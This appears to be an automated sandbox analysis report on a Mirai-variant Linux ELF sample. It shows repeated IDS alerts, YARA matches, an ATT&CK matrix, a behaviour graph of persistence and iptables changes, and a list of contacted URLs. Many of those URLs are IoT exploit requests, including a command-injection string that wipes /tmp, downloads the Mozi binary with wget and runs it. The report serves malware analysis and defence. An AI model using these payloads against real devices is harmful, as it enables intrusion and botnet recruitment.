                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
                            Source: Yara matchFile source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY
                            Source: Yara matchFile source: bin.sh.elf, type: SAMPLE
                            Source: Yara matchFile source: /usr/networks, type: DROPPED
                            Source: Yara matchFile source: 6242.1.00007fb730060000.00007fb73006a000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: 6240.1.00007fb730060000.00007fb73006a000.rw-.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: bin.sh.elf PID: 6242, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: bin.sh.elf PID: 6240, type: MEMORYSTR
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information3
                            Scripting
                            Valid Accounts1
                            Command and Scripting Interpreter
                            1
                            Unix Shell Configuration Modification
                            1
                            Unix Shell Configuration Modification
                            1
                            Masquerading
                            1
                            OS Credential Dumping
                            11
                            Security Software Discovery
                            Remote ServicesData from Local System1
                            Encrypted Channel
                            Exfiltration Over Other Network Medium1
                            Data Manipulation
                            CredentialsDomainsDefault AccountsScheduled Task/Job3
                            Scripting
                            Boot or Logon Initialization Scripts1
                            Hide Artifacts
                            1
                            Brute Force
                            1
                            Virtualization/Sandbox Evasion
                            Remote Desktop ProtocolData from Removable Media11
                            Non-Standard Port
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                            Virtualization/Sandbox Evasion
                            Security Account Manager1
                            Remote System Discovery
                            SMB/Windows Admin SharesData from Network Shared Drive3
                            Ingress Tool Transfer
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                            File and Directory Permissions Modification
                            NTDS1
                            System Network Configuration Discovery
                            Distributed Component Object ModelInput Capture4
                            Non-Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Hidden Files and Directories
                            LSA Secrets11
                            File and Directory Discovery
                            SSHKeylogging5
                            Application Layer Protocol
                            Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            File Deletion
                            Cached Domain Credentials1
                            System Information Discovery
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            No configs have been found
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Number of created Files
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1564319 Sample: bin.sh.elf Startdate: 28/11/2024 Architecture: LINUX Score: 100 76 171.79.99.1, 54778, 8080 AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServices India 2->76 78 216.186.136.8 WOW-INTERNETUS United States 2->78 80 102 other IPs or domains 2->80 82 Suricata IDS alerts for network traffic 2->82 84 Malicious sample detected (through community Yara rule) 2->84 86 Antivirus detection for dropped file 2->86 88 6 other signatures 2->88 11 dash rm bin.sh.elf 2->11         started        13 dash rm 2->13         started        15 dash cut 2->15         started        17 7 other processes 2->17 signatures3 process4 process5 19 bin.sh.elf 11->19         started        process6 21 bin.sh.elf 19->21         started        file7 68 /usr/networks, ELF 21->68 dropped 70 /usr/bin/rescan-scsi-bus.sh, ASCII 21->70 dropped 72 /usr/bin/gettext.sh, ASCII 21->72 dropped 74 16 other malicious files 21->74 dropped 92 Sample tries to set files in /etc globally writable 21->92 94 Sample tries to persist itself using /etc/profile 21->94 96 Drops files in suspicious directories 21->96 98 2 other signatures 21->98 25 bin.sh.elf 21->25         started        28 bin.sh.elf sh 21->28         started        30 bin.sh.elf sh 21->30         started        32 30 other processes 21->32 signatures8 process9 signatures10 104 Opens /proc/net/* files useful for finding connected devices and routers 25->104 34 bin.sh.elf sh 25->34         started        36 bin.sh.elf sh 25->36         started        38 bin.sh.elf sh 25->38         started        49 5 other processes 25->49 40 sh killall 28->40         started        43 sh iptables 30->43         started        45 sh iptables 32->45         started        47 sh iptables 32->47         started        51 21 other processes 32->51 process11 signatures12 53 sh iptables 34->53         started        56 sh iptables 36->56         started        58 sh iptables 38->58         started        100 Terminates several processes with shell command 'killall' 40->100 102 Executes the "iptables" command to insert, remove and/or manipulate rules 43->102 60 sh iptables 49->60         started        62 sh iptables 49->62         started        64 sh iptables 49->64         started        66 2 other processes 49->66 process13 signatures14 90 Executes the "iptables" command to insert, remove and/or manipulate rules 53->90
                            SourceDetectionScannerLabelLink
                            bin.sh.elf66%ReversingLabsLinux.Trojan.Mirai
                            bin.sh.elf100%AviraEXP/ELF.Mirai.O
                            SourceDetectionScannerLabelLink
                            /usr/networks100%AviraEXP/ELF.Mirai.O
                            /etc/init.d/S95baby.sh0%ReversingLabs
                            /etc/rcS.d/S95baby.sh0%ReversingLabs
                            /usr/networks66%ReversingLabsLinux.Trojan.Mirai
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://186.63.148.222:80/HNAP1/0%Avira URL Cloudsafe
                            http://158.171.104.91:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://155.6.109.17:80/HNAP1/0%Avira URL Cloudsafe
                            http://157.209.190.23:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://158.22.222.94:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://210.2.75.78:80/HNAP1/0%Avira URL Cloudsafe
                            http://128.160.247.151:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://58.208.230.98:80/HNAP1/0%Avira URL Cloudsafe
                            http://157.246.210.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://166.48.28.230:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://214.39.222.231:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://78.174.112.194:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://195.215.15.36:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://82.182.64.86:80/HNAP1/0%Avira URL Cloudsafe
                            http://1.145.88.230:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://8.59.167.66:80/HNAP1/0%Avira URL Cloudsafe
                            http://169.102.92.231:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://84.108.181.121:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://204.114.138.144:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://93.50.135.175:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://57.86.125.106:80/HNAP1/0%Avira URL Cloudsafe
                            http://165.42.160.13:80/HNAP1/0%Avira URL Cloudsafe
                            http://75.128.231.129:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://211.75.126.69:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://20.189.75.252:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://90.217.106.121:80/HNAP1/0%Avira URL Cloudsafe
                            http://84.48.173.191:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://39.29.53.94:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://199.231.185.52:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://182.155.232.129:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://82.247.4.104:80/HNAP1/0%Avira URL Cloudsafe
                            http://220.208.144.34:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://42.76.206.69:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://134.97.14.34:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://99.94.203.155:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://180.57.56.71:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://181.20.68.245:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://74.58.189.101:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://62.13.179.175:80/HNAP1/0%Avira URL Cloudsafe
                            http://11.229.114.210:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://72.134.146.85:80/HNAP1/0%Avira URL Cloudsafe
                            http://103.215.183.237:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://78.111.154.190:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://49.18.1.208:80/HNAP1/0%Avira URL Cloudsafe
                            http://106.126.135.113:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://135.158.93.91:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://73.77.168.19:80/HNAP1/0%Avira URL Cloudsafe
                            http://151.201.119.114:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://22.249.87.53:80/HNAP1/0%Avira URL Cloudsafe
                            http://134.87.142.186:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://29.90.152.126:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://217.15.207.28:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://187.109.155.118:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://176.67.30.177:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://53.126.136.182:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://192.252.242.222:80/HNAP1/0%Avira URL Cloudsafe
                            http://36.64.74.203:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://202.178.119.161:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://186.220.42.0:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://163.197.220.203:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://www.alsa-project.org.0%Avira URL Cloudsafe
                            http://160.79.59.90:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://220.157.8.218:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://161.142.203.178:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://121.41.156.213:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://86.1.241.8:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://220.213.171.152:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://110.177.183.23:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://152.249.241.6:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://211.52.34.202:80/HNAP1/0%Avira URL Cloudsafe
                            http://90.6.70.177:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://99.219.59.203:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://146.249.197.42:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://117.201.100.204:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://39.167.82.235:80/HNAP1/0%Avira URL Cloudsafe
                            http://4.222.236.14:80/HNAP1/0%Avira URL Cloudsafe
                            http://149.239.18.173:80/HNAP1/0%Avira URL Cloudsafe
                            http://53.189.162.142:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://14.91.101.35:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://204.181.118.146:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://155.65.230.109:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                            http://13.1.80.75:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://125.200.222.101:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
                            http://69.229.221.117:80/HNAP1/0%Avira URL Cloudsafe
                            http://177.200.207.58:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://139.39.140.82:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                            http://207.148.48.191:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
